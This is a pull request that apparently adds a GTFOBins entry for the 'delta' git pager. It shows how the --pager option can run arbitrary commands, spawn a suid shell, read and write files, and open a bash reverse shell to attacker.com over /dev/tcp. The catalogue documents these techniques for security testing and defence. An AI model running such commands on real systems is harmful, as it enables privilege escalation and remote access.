### PR TITLE
Add delta

### DIFF
--- a/_gtfobins/delta
+++ b/_gtfobins/delta
@@ -1,0 +1,38 @@
+---
+functions:
+  command:
+  - code: |-
+      delta --pager '/path/to/command' /dev/null /path/to/input-file
+    contexts:
+      sudo:
+      suid:
+        shell: true
+      unprivileged:
+  file-read:
+  - binary: false
+    code: |-
+      delta --pager cat /dev/null /path/to/input-file
+    comment: |-
+      The file is rendered as a diff against `/dev/null`, so the entire content is displayed as added lines with diff markup on each line.
+    contexts:
+      sudo:
+      suid:
+      unprivileged:
+  file-write:
+  - binary: false
+    code: |-
+      delta --pager 'tee /path/to/output-file' /dev/null /path/to/input-file
+    comment: |-
+      The output includes diff markup on each line.
+    contexts:
+      sudo:
+      suid:
+      unprivileged:
+  reverse-shell:
+  - code: |-
+      delta --pager 'bash -c "exec bash -i &>/dev/tcp/attacker.com/12345 <&1"' /dev/null /path/to/input-file
+    contexts:
+      sudo:
+      unprivileged:
+    listener: tcp-server
+...


### PR DESCRIPTION
`delta` is a syntax-highlighting pager for git and diff output, commonly configured as `core.pager`.

The `--pager` option executes an arbitrary command to display output. A file argument is required to produce output and invoke the pager. The `exec` form suppresses pager invocation.

Diffing `/dev/null` against a target file renders its entire content as added lines. Marked `binary: false` as diff markup is prepended to every output line.

Tested on delta 0.19.2, Kali Linux (Debian).